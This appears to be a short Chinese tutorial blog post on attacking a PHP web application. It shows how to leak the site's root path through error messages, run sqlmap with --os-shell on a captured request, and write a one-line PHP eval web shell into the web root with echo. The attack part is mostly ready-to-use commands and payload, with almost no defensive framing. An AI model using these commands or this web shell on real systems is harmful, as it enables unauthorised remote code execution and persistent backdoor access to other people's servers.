sqlmap (--os-shell) 的使用

文章探讨了黑客如何通过抓包技术展示根路径、利用SQL注入执行os-shell命令以及构造一句话木马。具体案例展示了使用python的sqlmap工具和PHP代码实现这些攻击手段,强调了过滤条件在安全防护中的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1. 可通过抓包,输入不合法的字符让页面回显出根路径

如:c:\appserv\www\phptest2\db_func.php 

我们需要猜测根目录是在 c:\appserv\www\phptest2\  还是在  c:\appserv\www\

2. 检测注入点 ,并进行--os-shell

python sqlmap.py -r  C:\Users\111.txt --os-shell

 

3.可通过 echo 来创建一句话木马 (根据过滤条件自行构造)

如:echo "<?php eval($_REQUEST[a])?>"  > c:\appserv\www\phptest2\ 111.php

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值